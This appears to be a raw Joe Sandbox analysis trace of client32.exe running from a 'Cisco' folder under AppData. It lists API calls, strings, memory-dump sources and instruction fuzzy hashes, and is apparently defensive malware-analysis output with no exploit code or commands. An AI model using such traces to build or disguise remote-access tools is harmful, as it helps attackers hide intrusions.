                                                                                                                                        • DispatchMessageA.USER32(?), ref: 11026E66
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                                        • String ID: Exit Msgloop, quit=%d
                                                                                                                                        • API String ID: 3212272093-2210386016
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • _memset.LIBCMT ref: 1110C477
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$ErrorExitLastMessageProcess_memset
                                                                                                                                        • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                                        • API String ID: 1322847840-2664294811
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1101761D
                                                                                                                                          • Part of subcall function 11017520: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101755C
                                                                                                                                          • Part of subcall function 11017520: CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                          • Part of subcall function 11017520: CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                          • Part of subcall function 11017440: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017472
                                                                                                                                          • Part of subcall function 11017440: CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                                          • Part of subcall function 11017440: CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                                        • SetEvent.KERNEL32(0000031C), ref: 1101763D
                                                                                                                                        • GetTickCount.KERNEL32 ref: 11017643
                                                                                                                                        Strings
                                                                                                                                        • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101764D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountInitializeObjectSingleTickUninitializeWait$Event
                                                                                                                                        • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                                        • API String ID: 3357037191-4122679463
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 688F4FC4
                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,688F8E0D,00000000,?,688F8E0D,00000000,?,00000FA0,?), ref: 688F4FE4
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688F8E0D,00000000,?,00000FA0,?), ref: 688F4FED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                                                        • String ID: EnumProcessModules
                                                                                                                                        • API String ID: 3858832252-3735562946
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 688F5014
                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,688F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 688F5034
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 688F503D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorFileLastModuleNameProc
                                                                                                                                        • String ID: GetModuleFileNameExA
                                                                                                                                        • API String ID: 4084229558-758377266
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • CreateThread.KERNEL32(00000000,00001000,Function_00134AC0,00000000,00000000,11135C92), ref: 11134CBE
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,11135C92,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134CC5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                                                        • String ID: *AutoICFConfig$Client
                                                                                                                                        • API String ID: 3257255551-59951473
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 1106FDC7
                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 1106FDD4
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1106FEA6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                                        • String ID: Push
                                                                                                                                        • API String ID: 1566154052-4278761818
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000000,?,?,?,688FDA7F,?,00000000), ref: 688FA503
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 688FA568
                                                                                                                                        • Sleep.KERNEL32(00000000,?,688FDA7F,?,00000000), ref: 688FA581
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,00000000), ref: 688FA5B3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4212191310-0
                                                                                                                                        • Opcode ID: 2da1e8e5a6792307d67863e05431705435da21dc968808dd261f548205c57407
                                                                                                                                        • Instruction ID: 7bf4ed63e0f48adc7bace38c578aef2ceddbfc59b9c6462ae1f4886614bfa605
                                                                                                                                        • Opcode Fuzzy Hash: 2da1e8e5a6792307d67863e05431705435da21dc968808dd261f548205c57407
                                                                                                                                        • Instruction Fuzzy Hash: B621AAB6904A10AFDB318F5CC84565EB7B9AF96368F410836D866A3540D371A941CB51
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                        • API String ID: 2251294070-3116060180
                                                                                                                                        • Opcode ID: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
                                                                                                                                        • Instruction ID: f66355bd66e631ef02f67cdace41a374b72edc36f1231e7adb2d1e88445570b8
                                                                                                                                        • Opcode Fuzzy Hash: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
                                                                                                                                        • Instruction Fuzzy Hash: E011C8707052125FE706DFA6C980B6AFBE5AB84B58F20403CD919C7685DB72D841C791
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __strdup
                                                                                                                                        • String ID: *this==pszSrc$..\CTL32\NSMString.cpp
                                                                                                                                        • API String ID: 838363481-1175285396
                                                                                                                                        • Opcode ID: e90a2aaa10d8eacd40dd7991997a438b49a3dcc3dec7f443c349a3eee85cbaf6
                                                                                                                                        • Instruction ID: d368fb1530c02c638087ab9804e20e1779960f820b273a240435e2c59da99733
                                                                                                                                        • Opcode Fuzzy Hash: e90a2aaa10d8eacd40dd7991997a438b49a3dcc3dec7f443c349a3eee85cbaf6
                                                                                                                                        • Instruction Fuzzy Hash: 9FF02875E003566BC311DE1AA804B9FFFEC8F81A68B0480B9EC99D7211EA31E805CBD0
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 110151C7
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110151D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                                                        • String ID: \\.\NSWFPDrv
                                                                                                                                        • API String ID: 3498533004-85019792
                                                                                                                                        • Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                                        • Instruction ID: 037b8784f9df01d9315ef50b2b73ebd220fb6a4ab94c0d71800f6b4bfbf8c5f7
                                                                                                                                        • Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                                        • Instruction Fuzzy Hash: AAD0C971A410347AE23119AAAC4CFCBBD1DDB427B6F310360BA2DE51C4C210485182F1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _fgets$_strpbrk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2467700830-0
                                                                                                                                        • Opcode ID: d38be73a97708ed3cebce13a6138e1835c16ac10043bd1595ceda96381bbbe7b
                                                                                                                                        • Instruction ID: e042e00db1c15bd3ea3848fad782c45c58cddd6e5cc14a0db7c635f2d40bc436
                                                                                                                                        • Opcode Fuzzy Hash: d38be73a97708ed3cebce13a6138e1835c16ac10043bd1595ceda96381bbbe7b
                                                                                                                                        • Instruction Fuzzy Hash: 3D51C471E0466A9BDB11CB64DC40FAFBBBCAF85345F0482D8E949D7280EB31AA45CF51
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _calloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1679841372-0
                                                                                                                                        • Opcode ID: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                                        • Instruction ID: 5870c534f1e9cad6bc1b8df2b52652ede84eef16f18a371c225005308c6cd6aa
                                                                                                                                        • Opcode Fuzzy Hash: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                                        • Instruction Fuzzy Hash: 81519F35600206AFDB90CF59CC80FAABBA5EF8A354F108459ED29DB354D730EA11CBA0
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688F8FE4
                                                                                                                                        • getsockname.WSOCK32(?,?,00000010,?,025E2EF8,?), ref: 688F9005
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,00000010,?,025E2EF8,?), ref: 688F902E
                                                                                                                                          • Part of subcall function 688F5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,688F8F91,00000000,00000000,6893B8DA,?,00000080), ref: 688F5852
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3066294524-0
                                                                                                                                        • Opcode ID: 9fc7b51f5081a0d40eb5227b2282faae5e67f2a75bf40badeb221862bee64e2c
                                                                                                                                        • Instruction ID: 87fbcd10e4bc6e2615f8f8f5fe31b4a12c03be1feeb8af38397fa5932188a82b
                                                                                                                                        • Opcode Fuzzy Hash: 9fc7b51f5081a0d40eb5227b2282faae5e67f2a75bf40badeb221862bee64e2c
                                                                                                                                        • Instruction Fuzzy Hash: 92111C76A0811CABCB10DFA9DD01ABFB7B8EB59214F40456AEC05E7240E770AA15CB91
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                                        • __wsplitpath.LIBCMT ref: 1110E405
                                                                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryInformationSystemVolume__wsplitpath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 395646034-0
                                                                                                                                        • Opcode ID: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
                                                                                                                                        • Instruction ID: 49ee09b274793d3f37b85f9af0a235e2207b6666fb7fe841f2bc02eb00c982ac
                                                                                                                                        • Opcode Fuzzy Hash: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
                                                                                                                                        • Instruction Fuzzy Hash: 5911A135A4021DABEB14CB94CC42FEDF378AB48B04F1040D5E724AB1C0E7B02A08CB65
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                          • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,7622F550,?,00000000), ref: 1109DC58
                                                                                                                                          • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                                          • Part of subcall function 1109DC20: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                                          • Part of subcall function 1109DC20: EqualSid.ADVAPI32(?,004B11D8,?,00000001,00000001), ref: 1109DCB3
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2256153495-0
                                                                                                                                        • Opcode ID: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                        • Instruction ID: c89a6c7b331b2a9e52fe7b246e4b03132f6c449d5caf40a75acaa97b60e2562d
                                                                                                                                        • Opcode Fuzzy Hash: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                        • Instruction Fuzzy Hash: 71F08CB5E42319EFC705DFE5D8849AEFBB8AF09308750847DEA1AC3204D631DA009F61
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSection.KERNEL32(111EC8B8,A0A8B03E,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
                                                                                                                                        • EnterCriticalSection.KERNEL32(111EC8B8,A0A8B03E,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
                                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3991485460-0
                                                                                                                                        • Opcode ID: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                        • Instruction ID: 5cbfd62ab707a984bc8f9840cb1ce5c13d1e9dd1c8f4cb6af8017bccb6afb893
                                                                                                                                        • Opcode Fuzzy Hash: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                        • Instruction Fuzzy Hash: DC117375A01B25AFE7029F89CE88F9EFBE8EB45624F40416AF911A3740D73498008B91
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068012
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: ??CTL32.DLL
                                                                                                                                        • API String ID: 1029625771-2984404022
                                                                                                                                        • Opcode ID: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
                                                                                                                                        • Instruction ID: 32b9202a4fc65b1dacbe7aa8c831b48159e18a8703659cb8720647e729342126
                                                                                                                                        • Opcode Fuzzy Hash: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
                                                                                                                                        • Instruction Fuzzy Hash: C431D371A04655DFE711CF59DC40F5AF7E8FB45724F0086BAE9199B380E731A900CB91
                                                                                                                                        APIs
                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 110267DD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DriveType
                                                                                                                                        • String ID: ?:\
                                                                                                                                        • API String ID: 338552980-2533537817
                                                                                                                                        • Opcode ID: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                                        • Instruction ID: 38449473f5ed5767ddcbcf892a2d2af3f0dceeb725c671958e56149c4f091727
                                                                                                                                        • Opcode Fuzzy Hash: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                                        • Instruction Fuzzy Hash: 6DF0B460C043D63AEB22CE60A84459ABFD85F062A8F54C8DEDCDC46941E1B6E188C791
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 110EAE90: RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,A0A8B03E), ref: 110EAE9D
                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,A0A8B03E), ref: 110EAEEC
                                                                                                                                          • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                                        Strings
                                                                                                                                        • Error %d Opening regkey %s, xrefs: 110EAEFA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenwvsprintf
                                                                                                                                        • String ID: Error %d Opening regkey %s
                                                                                                                                        • API String ID: 1772833024-3994271378
                                                                                                                                        • Opcode ID: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                                        • Instruction ID: 09eb28a66f6e9341cb3e48657c7c8114af41280c10e95afb1c39da68eab11178
                                                                                                                                        • Opcode Fuzzy Hash: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                                        • Instruction Fuzzy Hash: BFE092BA701319BFD210D65A9C88FABBB5DDBC96A4F014025FA0897341D971EC4082B0
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 1110C4D2
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorExitLastMessageProcess_memsetwsprintf
                                                                                                                                        • String ID: ..\ctl32\Refcount.cpp
                                                                                                                                        • API String ID: 4120431230-2363596943
                                                                                                                                        • Opcode ID: 6765fa335fcdcad4f0c283e578fe81b341abc99ab6d3b7cddb529ba8f05bb30a
                                                                                                                                        • Instruction ID: fb683ad4537a29421ebad94ea8a5926084d263391e6db2c8366a4dac22183ed0
                                                                                                                                        • Opcode Fuzzy Hash: 6765fa335fcdcad4f0c283e578fe81b341abc99ab6d3b7cddb529ba8f05bb30a
                                                                                                                                        • Instruction Fuzzy Hash: D4E08C3BE4013932C1A1248A7C42FABFA5C4B92AA8F050021FD18A6211A545660181E6
                                                                                                                                        APIs
                                                                                                                                        • RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,A0A8B03E), ref: 110EAE9D
                                                                                                                                          • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                                        Strings
                                                                                                                                        • Error %d closing regkey %x, xrefs: 110EAEAD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Closewvsprintf
                                                                                                                                        • String ID: Error %d closing regkey %x
                                                                                                                                        • API String ID: 843752472-892920262
                                                                                                                                        • Opcode ID: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                                        • Instruction ID: 92a7a0ee5207e3186e072fae0831ab025553d10eab44dfd4ffee7659da325c5a
                                                                                                                                        • Opcode Fuzzy Hash: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                                        • Instruction Fuzzy Hash: FEE08675602152DFD335CA1EAC58F67B6D99FC9710F12456DB841D3300DB70C8418660
                                                                                                                                        APIs
